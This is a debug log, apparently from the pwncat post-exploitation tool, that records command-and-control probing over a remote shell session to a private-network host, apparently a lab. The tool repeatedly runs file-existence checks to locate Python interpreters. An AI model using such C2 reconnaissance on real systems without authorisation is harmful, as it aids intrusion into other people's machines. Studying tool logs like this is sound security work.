2020-06-12 17:05:30,935 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python2.7/bin/python2 && echo /usr/local/python2.7/bin/python2 || echo;\n'
2020-06-12 17:05:30,935 DEBUG [MainThread] 1826:send(): Sent 91 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:30,966 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:30,967 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python2.7/bin/python2.7
2020-06-12 17:05:30,967 DEBUG [MainThread] 1803:send(): Trying to send 95 bytes to 10.10.182.191:45802
2020-06-12 17:05:30,967 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python2.7/bin/python2.7 && echo /usr/local/python2.7/bin/python2.7 || echo;\n'
2020-06-12 17:05:30,967 DEBUG [MainThread] 1826:send(): Sent 95 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:30,993 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:30,993 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python2.7/bin/python3
2020-06-12 17:05:30,993 DEBUG [MainThread] 1803:send(): Trying to send 91 bytes to 10.10.182.191:45802
2020-06-12 17:05:30,993 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python2.7/bin/python3 && echo /usr/local/python2.7/bin/python3 || echo;\n'
2020-06-12 17:05:30,993 DEBUG [MainThread] 1826:send(): Sent 91 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:31,178 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:31,178 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python2.7/bin/python3.5
2020-06-12 17:05:31,179 DEBUG [MainThread] 1803:send(): Trying to send 95 bytes to 10.10.182.191:45802
2020-06-12 17:05:31,179 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python2.7/bin/python3.5 && echo /usr/local/python2.7/bin/python3.5 || echo;\n'
2020-06-12 17:05:31,179 DEBUG [MainThread] 1826:send(): Sent 95 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:31,202 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:31,203 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python2.7/bin/python3.6
2020-06-12 17:05:31,203 DEBUG [MainThread] 1803:send(): Trying to send 95 bytes to 10.10.182.191:45802
2020-06-12 17:05:31,203 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python2.7/bin/python3.6 && echo /usr/local/python2.7/bin/python3.6 || echo;\n'
2020-06-12 17:05:31,204 DEBUG [MainThread] 1826:send(): Sent 95 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:31,270 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:31,270 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python2.7/bin/python3.7
2020-06-12 17:05:31,270 DEBUG [MainThread] 1803:send(): Trying to send 95 bytes to 10.10.182.191:45802
2020-06-12 17:05:31,270 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python2.7/bin/python3.7 && echo /usr/local/python2.7/bin/python3.7 || echo;\n'
2020-06-12 17:05:31,270 DEBUG [MainThread] 1826:send(): Sent 95 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:31,403 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:31,403 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python2.7/bin/python3.8
2020-06-12 17:05:31,404 DEBUG [MainThread] 1803:send(): Trying to send 95 bytes to 10.10.182.191:45802
2020-06-12 17:05:31,404 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python2.7/bin/python3.8 && echo /usr/local/python2.7/bin/python3.8 || echo;\n'
2020-06-12 17:05:31,404 DEBUG [MainThread] 1826:send(): Sent 95 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:31,473 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:31,473 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3/bin/python
2020-06-12 17:05:31,473 DEBUG [MainThread] 1803:send(): Trying to send 85 bytes to 10.10.182.191:45802
2020-06-12 17:05:31,473 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3/bin/python && echo /usr/local/python3/bin/python || echo;\n'
2020-06-12 17:05:31,473 DEBUG [MainThread] 1826:send(): Sent 85 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:31,499 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:31,499 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3/bin/python2
2020-06-12 17:05:31,499 DEBUG [MainThread] 1803:send(): Trying to send 87 bytes to 10.10.182.191:45802
2020-06-12 17:05:31,499 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3/bin/python2 && echo /usr/local/python3/bin/python2 || echo;\n'
2020-06-12 17:05:31,499 DEBUG [MainThread] 1826:send(): Sent 87 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:31,525 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:31,526 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3/bin/python2.7
2020-06-12 17:05:31,526 DEBUG [MainThread] 1803:send(): Trying to send 91 bytes to 10.10.182.191:45802
2020-06-12 17:05:31,526 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3/bin/python2.7 && echo /usr/local/python3/bin/python2.7 || echo;\n'
2020-06-12 17:05:31,526 DEBUG [MainThread] 1826:send(): Sent 91 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:31,567 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:31,567 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3/bin/python3
2020-06-12 17:05:31,567 DEBUG [MainThread] 1803:send(): Trying to send 87 bytes to 10.10.182.191:45802
2020-06-12 17:05:31,567 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3/bin/python3 && echo /usr/local/python3/bin/python3 || echo;\n'
2020-06-12 17:05:31,567 DEBUG [MainThread] 1826:send(): Sent 87 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:31,592 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:31,592 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3/bin/python3.5
2020-06-12 17:05:31,592 DEBUG [MainThread] 1803:send(): Trying to send 91 bytes to 10.10.182.191:45802
2020-06-12 17:05:31,592 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3/bin/python3.5 && echo /usr/local/python3/bin/python3.5 || echo;\n'
2020-06-12 17:05:31,592 DEBUG [MainThread] 1826:send(): Sent 91 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:31,616 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:31,616 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3/bin/python3.6
2020-06-12 17:05:31,616 DEBUG [MainThread] 1803:send(): Trying to send 91 bytes to 10.10.182.191:45802
2020-06-12 17:05:31,616 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3/bin/python3.6 && echo /usr/local/python3/bin/python3.6 || echo;\n'
2020-06-12 17:05:31,616 DEBUG [MainThread] 1826:send(): Sent 91 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:31,792 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:31,793 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3/bin/python3.7
2020-06-12 17:05:31,793 DEBUG [MainThread] 1803:send(): Trying to send 91 bytes to 10.10.182.191:45802
2020-06-12 17:05:31,793 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3/bin/python3.7 && echo /usr/local/python3/bin/python3.7 || echo;\n'
2020-06-12 17:05:31,794 DEBUG [MainThread] 1826:send(): Sent 91 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:31,818 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:31,818 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3/bin/python3.8
2020-06-12 17:05:31,819 DEBUG [MainThread] 1803:send(): Trying to send 91 bytes to 10.10.182.191:45802
2020-06-12 17:05:31,819 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3/bin/python3.8 && echo /usr/local/python3/bin/python3.8 || echo;\n'
2020-06-12 17:05:31,819 DEBUG [MainThread] 1826:send(): Sent 91 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:31,884 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:31,884 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3.5/bin/python
2020-06-12 17:05:31,884 DEBUG [MainThread] 1803:send(): Trying to send 89 bytes to 10.10.182.191:45802
2020-06-12 17:05:31,884 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.5/bin/python && echo /usr/local/python3.5/bin/python || echo;\n'
2020-06-12 17:05:31,884 DEBUG [MainThread] 1826:send(): Sent 89 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:32,002 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:32,002 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3.5/bin/python2
2020-06-12 17:05:32,002 DEBUG [MainThread] 1803:send(): Trying to send 91 bytes to 10.10.182.191:45802
2020-06-12 17:05:32,002 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.5/bin/python2 && echo /usr/local/python3.5/bin/python2 || echo;\n'
2020-06-12 17:05:32,002 DEBUG [MainThread] 1826:send(): Sent 91 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:32,089 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:32,089 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3.5/bin/python2.7
2020-06-12 17:05:32,090 DEBUG [MainThread] 1803:send(): Trying to send 95 bytes to 10.10.182.191:45802
2020-06-12 17:05:32,090 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.5/bin/python2.7 && echo /usr/local/python3.5/bin/python2.7 || echo;\n'
2020-06-12 17:05:32,090 DEBUG [MainThread] 1826:send(): Sent 95 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:32,129 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:32,129 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3.5/bin/python3
2020-06-12 17:05:32,129 DEBUG [MainThread] 1803:send(): Trying to send 91 bytes to 10.10.182.191:45802
2020-06-12 17:05:32,129 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.5/bin/python3 && echo /usr/local/python3.5/bin/python3 || echo;\n'
2020-06-12 17:05:32,130 DEBUG [MainThread] 1826:send(): Sent 91 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:32,155 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:32,156 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3.5/bin/python3.5
2020-06-12 17:05:32,156 DEBUG [MainThread] 1803:send(): Trying to send 95 bytes to 10.10.182.191:45802
2020-06-12 17:05:32,156 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.5/bin/python3.5 && echo /usr/local/python3.5/bin/python3.5 || echo;\n'
2020-06-12 17:05:32,156 DEBUG [MainThread] 1826:send(): Sent 95 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:32,185 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:32,185 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3.5/bin/python3.6
2020-06-12 17:05:32,185 DEBUG [MainThread] 1803:send(): Trying to send 95 bytes to 10.10.182.191:45802
2020-06-12 17:05:32,185 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.5/bin/python3.6 && echo /usr/local/python3.5/bin/python3.6 || echo;\n'
2020-06-12 17:05:32,185 DEBUG [MainThread] 1826:send(): Sent 95 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:32,234 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:32,234 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3.5/bin/python3.7
2020-06-12 17:05:32,234 DEBUG [MainThread] 1803:send(): Trying to send 95 bytes to 10.10.182.191:45802
2020-06-12 17:05:32,234 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.5/bin/python3.7 && echo /usr/local/python3.5/bin/python3.7 || echo;\n'
2020-06-12 17:05:32,234 DEBUG [MainThread] 1826:send(): Sent 95 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:32,407 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:32,407 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3.5/bin/python3.8
2020-06-12 17:05:32,408 DEBUG [MainThread] 1803:send(): Trying to send 95 bytes to 10.10.182.191:45802
2020-06-12 17:05:32,408 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.5/bin/python3.8 && echo /usr/local/python3.5/bin/python3.8 || echo;\n'
2020-06-12 17:05:32,408 DEBUG [MainThread] 1826:send(): Sent 95 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:32,432 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:32,432 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3.6/bin/python
2020-06-12 17:05:32,432 DEBUG [MainThread] 1803:send(): Trying to send 89 bytes to 10.10.182.191:45802
2020-06-12 17:05:32,432 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.6/bin/python && echo /usr/local/python3.6/bin/python || echo;\n'
2020-06-12 17:05:32,432 DEBUG [MainThread] 1826:send(): Sent 89 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:32,468 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:32,468 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3.6/bin/python2
2020-06-12 17:05:32,468 DEBUG [MainThread] 1803:send(): Trying to send 91 bytes to 10.10.182.191:45802
2020-06-12 17:05:32,468 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.6/bin/python2 && echo /usr/local/python3.6/bin/python2 || echo;\n'
2020-06-12 17:05:32,468 DEBUG [MainThread] 1826:send(): Sent 91 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:32,501 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:32,501 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3.6/bin/python2.7
2020-06-12 17:05:32,501 DEBUG [MainThread] 1803:send(): Trying to send 95 bytes to 10.10.182.191:45802
2020-06-12 17:05:32,501 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.6/bin/python2.7 && echo /usr/local/python3.6/bin/python2.7 || echo;\n'
2020-06-12 17:05:32,501 DEBUG [MainThread] 1826:send(): Sent 95 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:32,641 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:32,642 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3.6/bin/python3
2020-06-12 17:05:32,642 DEBUG [MainThread] 1803:send(): Trying to send 91 bytes to 10.10.182.191:45802
2020-06-12 17:05:32,642 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.6/bin/python3 && echo /usr/local/python3.6/bin/python3 || echo;\n'
2020-06-12 17:05:32,643 DEBUG [MainThread] 1826:send(): Sent 91 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:32,665 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:32,665 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3.6/bin/python3.5
2020-06-12 17:05:32,665 DEBUG [MainThread] 1803:send(): Trying to send 95 bytes to 10.10.182.191:45802
2020-06-12 17:05:32,665 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.6/bin/python3.5 && echo /usr/local/python3.6/bin/python3.5 || echo;\n'
2020-06-12 17:05:32,666 DEBUG [MainThread] 1826:send(): Sent 95 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:32,689 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:32,689 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3.6/bin/python3.6
2020-06-12 17:05:32,689 DEBUG [MainThread] 1803:send(): Trying to send 95 bytes to 10.10.182.191:45802
2020-06-12 17:05:32,689 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.6/bin/python3.6 && echo /usr/local/python3.6/bin/python3.6 || echo;\n'
2020-06-12 17:05:32,689 DEBUG [MainThread] 1826:send(): Sent 95 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:32,712 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:32,712 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3.6/bin/python3.7
2020-06-12 17:05:32,713 DEBUG [MainThread] 1803:send(): Trying to send 95 bytes to 10.10.182.191:45802
2020-06-12 17:05:32,713 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.6/bin/python3.7 && echo /usr/local/python3.6/bin/python3.7 || echo;\n'
2020-06-12 17:05:32,713 DEBUG [MainThread] 1826:send(): Sent 95 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:32,738 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:32,738 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3.6/bin/python3.8
2020-06-12 17:05:32,738 DEBUG [MainThread] 1803:send(): Trying to send 95 bytes to 10.10.182.191:45802
2020-06-12 17:05:32,738 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.6/bin/python3.8 && echo /usr/local/python3.6/bin/python3.8 || echo;\n'
2020-06-12 17:05:32,738 DEBUG [MainThread] 1826:send(): Sent 95 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:32,763 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:32,763 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3.7/bin/python
2020-06-12 17:05:32,764 DEBUG [MainThread] 1803:send(): Trying to send 89 bytes to 10.10.182.191:45802
2020-06-12 17:05:32,764 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.7/bin/python && echo /usr/local/python3.7/bin/python || echo;\n'
2020-06-12 17:05:32,764 DEBUG [MainThread] 1826:send(): Sent 89 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:32,795 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:32,796 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3.7/bin/python2
2020-06-12 17:05:32,796 DEBUG [MainThread] 1803:send(): Trying to send 91 bytes to 10.10.182.191:45802
2020-06-12 17:05:32,796 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.7/bin/python2 && echo /usr/local/python3.7/bin/python2 || echo;\n'
2020-06-12 17:05:32,796 DEBUG [MainThread] 1826:send(): Sent 91 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:32,820 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:32,820 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3.7/bin/python2.7
2020-06-12 17:05:32,820 DEBUG [MainThread] 1803:send(): Trying to send 95 bytes to 10.10.182.191:45802
2020-06-12 17:05:32,820 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.7/bin/python2.7 && echo /usr/local/python3.7/bin/python2.7 || echo;\n'
2020-06-12 17:05:32,820 DEBUG [MainThread] 1826:send(): Sent 95 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:32,845 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:32,845 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3.7/bin/python3
2020-06-12 17:05:32,845 DEBUG [MainThread] 1803:send(): Trying to send 91 bytes to 10.10.182.191:45802
2020-06-12 17:05:32,845 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.7/bin/python3 && echo /usr/local/python3.7/bin/python3 || echo;\n'
2020-06-12 17:05:32,845 DEBUG [MainThread] 1826:send(): Sent 91 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:32,869 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:32,869 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3.7/bin/python3.5
2020-06-12 17:05:32,869 DEBUG [MainThread] 1803:send(): Trying to send 95 bytes to 10.10.182.191:45802
2020-06-12 17:05:32,869 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.7/bin/python3.5 && echo /usr/local/python3.7/bin/python3.5 || echo;\n'
2020-06-12 17:05:32,869 DEBUG [MainThread] 1826:send(): Sent 95 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:32,893 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:32,893 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3.7/bin/python3.6
2020-06-12 17:05:32,893 DEBUG [MainThread] 1803:send(): Trying to send 95 bytes to 10.10.182.191:45802
2020-06-12 17:05:32,893 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.7/bin/python3.6 && echo /usr/local/python3.7/bin/python3.6 || echo;\n'
2020-06-12 17:05:32,893 DEBUG [MainThread] 1826:send(): Sent 95 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:32,917 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:32,917 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3.7/bin/python3.7
2020-06-12 17:05:32,917 DEBUG [MainThread] 1803:send(): Trying to send 95 bytes to 10.10.182.191:45802
2020-06-12 17:05:32,917 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.7/bin/python3.7 && echo /usr/local/python3.7/bin/python3.7 || echo;\n'
2020-06-12 17:05:32,917 DEBUG [MainThread] 1826:send(): Sent 95 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:32,941 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:32,941 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3.7/bin/python3.8
2020-06-12 17:05:32,941 DEBUG [MainThread] 1803:send(): Trying to send 95 bytes to 10.10.182.191:45802
2020-06-12 17:05:32,941 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.7/bin/python3.8 && echo /usr/local/python3.7/bin/python3.8 || echo;\n'
2020-06-12 17:05:32,941 DEBUG [MainThread] 1826:send(): Sent 95 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:32,966 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:32,967 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3.8/bin/python
2020-06-12 17:05:32,967 DEBUG [MainThread] 1803:send(): Trying to send 89 bytes to 10.10.182.191:45802
2020-06-12 17:05:32,967 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.8/bin/python && echo /usr/local/python3.8/bin/python || echo;\n'
2020-06-12 17:05:32,967 DEBUG [MainThread] 1826:send(): Sent 89 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:32,991 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:32,991 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3.8/bin/python2
2020-06-12 17:05:32,991 DEBUG [MainThread] 1803:send(): Trying to send 91 bytes to 10.10.182.191:45802
2020-06-12 17:05:32,991 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.8/bin/python2 && echo /usr/local/python3.8/bin/python2 || echo;\n'
2020-06-12 17:05:32,991 DEBUG [MainThread] 1826:send(): Sent 91 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:33,016 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:33,016 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3.8/bin/python2.7
2020-06-12 17:05:33,016 DEBUG [MainThread] 1803:send(): Trying to send 95 bytes to 10.10.182.191:45802
2020-06-12 17:05:33,017 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.8/bin/python2.7 && echo /usr/local/python3.8/bin/python2.7 || echo;\n'
2020-06-12 17:05:33,017 DEBUG [MainThread] 1826:send(): Sent 95 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:33,040 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:33,040 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3.8/bin/python3
2020-06-12 17:05:33,041 DEBUG [MainThread] 1803:send(): Trying to send 91 bytes to 10.10.182.191:45802
2020-06-12 17:05:33,041 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.8/bin/python3 && echo /usr/local/python3.8/bin/python3 || echo;\n'
2020-06-12 17:05:33,041 DEBUG [MainThread] 1826:send(): Sent 91 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:33,065 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:33,065 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3.8/bin/python3.5
2020-06-12 17:05:33,065 DEBUG [MainThread] 1803:send(): Trying to send 95 bytes to 10.10.182.191:45802
2020-06-12 17:05:33,065 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.8/bin/python3.5 && echo /usr/local/python3.8/bin/python3.5 || echo;\n'
2020-06-12 17:05:33,065 DEBUG [MainThread] 1826:send(): Sent 95 bytes to 10.10.182.191:45802 (0 bytes remaining)
